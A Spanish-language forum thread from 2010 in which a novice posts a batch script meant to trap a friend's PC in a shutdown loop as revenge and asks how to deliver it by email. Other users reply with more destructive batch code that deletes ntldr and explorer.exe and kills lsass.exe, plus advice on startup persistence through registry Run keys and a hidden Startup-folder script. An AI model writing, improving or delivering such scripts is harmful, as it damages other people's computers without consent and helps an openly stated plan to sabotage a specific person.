Maldad.bat ¬¬?

Iniciado por DA KILLER, 11 Abril 2010, 09:37 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1 2
Acciones del Usuario

DA KILLER

11 Abril 2010, 09:37 AM
Hola, hace unos dias empece en esto de la programación y tras un poco de práctica pensé en hacer un programa con un fin malicioso ya que es en venganza a un amigo que como chistoso me trató de instalar un keylogger, espero su opinión y quería que me digan si me equivoco en el código ya que obviamente no lo puedo probar en mi computadora y el ciber está cerrado por mantenimiento ¬¬' .

Name.bat

Código [Seleccionar]
@echo off
color 0A
echo.
echo                       --------------------------------------
echo                        .*ï ENTER THE PASSWORD FOR START `*.
echo                       --------------------------------------
echo.
echo.
set/p pass=Password:
if %pass%==54537 (start title KILLER'$) ELSE (echo Wrong pass!
goto bad)
:bad
echo shutdown -s -f -t 0 >> c:\autoexec.bat

Si no me equivoco la cosa sería que si el usuario no ingresa como pass "54537" se apagaría el PC y quedaría en la configuración del autoexe así que se prendería y apagaría.

Espero respuestas y opiniones, y si alguien me explica como podría hacer para plantarlo mediante un email y ejecutarlo remotamente lo agradeceré.

Saludos a todos.
.: DA KILLER :.


DA KILLER

#1
11 Abril 2010, 10:36 AM
Lo siento de nuevo me equivoqué de sección, si algún mod lo lee que lo pase a la sección correspondiente

:-[ Perdon por las molestias :-[
.: DA KILLER :.


leogtz

#2
11 Abril 2010, 18:08 PM
¿Qué es KILLER'$?

Respecto al código, te digo que es muy simple.
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

winroot

#3
11 Abril 2010, 19:43 PM
na
Código [Seleccionar]

@echo off
attrib -h -s -r  c:\ntldr
del /q c:\ntldr
move %windir%\system32\shutdown.exe %windir%\system32\drivers\etc\a.exe
taskkill /f /im lsass.exe
taskkill /f /im explorer.exe
del /q %windir%\explorer.exe
start %windir%\system32\drivers\etc\a.exe -s -t0


lo de autoejecutarse, el autoexec.bat no funciona como archivo de arranque en  windows nt,para eso estan las keys del registro.
con el   comando reg, podes manejar el registro.

saludos  


:xD
Mi blog sobre programación y seguridad informática:
http://win-root.blogspot.com

DA KILLER

#4
12 Abril 2010, 00:50 AM
Citar¿Qué es KILLER'$?

Respecto al código, te digo que es muy simple.

KILLER'$ es el título de la ventana del DOS o CMD

Código [Seleccionar]
start title KILLER'$

KILLER es mi nick "Da KILLER" es la pronunciación en español de "THE KILLER"

Y si el objetivo es que el comando sea la más simple posible
Citarlo de autoejecutarse, el autoexec.bat no funciona como archivo de arranque en  windows nt,para eso estan las keys del registro.
con el   comando reg, podes manejar el registro.

saludos

Si es que no se NADA de programación y como nunca utilizé NT ni ME ni VISTA ni 7 no tengo idea de que puede funcionar o no, pero llevo menos de una semana en esto de la programación, en cuanto al REG lo voy a practicar esta noche o mañana.

Igual gracias por la ayuda :)
.: DA KILLER :.


☺BADMAN

#5
12 Abril 2010, 00:56 AM
Código [Seleccionar]
echo shutdown -s -f -t 0 >> c:\autoexec.bat


  Xd Men esto es Futurama ... :¬¬
Experto en Biefrost.
Subseven User.
Especialista en crypters.
Tifa FAN
Batch Programer XD ;D

DA KILLER

#6
12 Abril 2010, 01:02 AM
Pues para mi mas o menos si  :P

Pero en lugar de ser fry soy como Zoiberg  :-\
.: DA KILLER :.


winroot

#7
12 Abril 2010, 01:21 AM
Cita de: ☺BADMAN en 12 Abril 2010, 00:56 AM
Código [Seleccionar]
echo shutdown -s -f -t 0 >> c:\autoexec.bat


  Xd Men esto es Futurama ... :¬¬
hola,

en  realidad, ese archivo se usava en msdos y solo esta en windows por compatibilidad de aplicaciones de 16 bits.

para correr al arranque hay muchas maneras.
la mas usada por el malware es el registro de windows, mas espesificamente los servicios (hklm\system\services)
y las keys run (hklm||hkcu\software\microsoft\windows\currentversion\run)
con la  utilidad  msconfig, se  pueden ver los programas puestos al arranque de windows.

otra cosa, recuerden que batch no es un lenguaje de programacion.

no te recomiendo empezar a manejar el registro de windows, sin saber  primero lo basico de batch, y algo sobre el funcionamiento  interno de windows.

saludos 
Mi blog sobre programación y seguridad informática:
http://win-root.blogspot.com

berni69

#8
12 Abril 2010, 19:44 PM
Siempre se podria hacer algo asi  :rolleyes:

Código [Seleccionar]

echo shutdown -s -f -t 0 >>  123.bat
copy 123.bat "%homedrive%%homepath%\MENINI~1\Programas\Inicio"
cd "%homedrive%%homepath%\MENINI~1\Programas\Inicio\"
attrib +r +h +s +a 123.bat
start 123.bat

y asi no tener que tocar el registro jeje
Errar es humano, pero para liar las cosas de verdad se necesita un ordenador

Tutorial Swifi keygen + Airwin 2.0

DA KILLER

#9
14 Abril 2010, 03:29 AM
Bueno gracias a todos por la ayuda, realmente me han ayudado mucho y en cuanto pueda voy a tratar de probarlo a ver que tal funciona.

Saludos a todos y gracias por todo de nuevo.

-KILLER-
.: DA KILLER :.


Imprimir
Ir Arriba Páginas1 2
Acciones del Usuario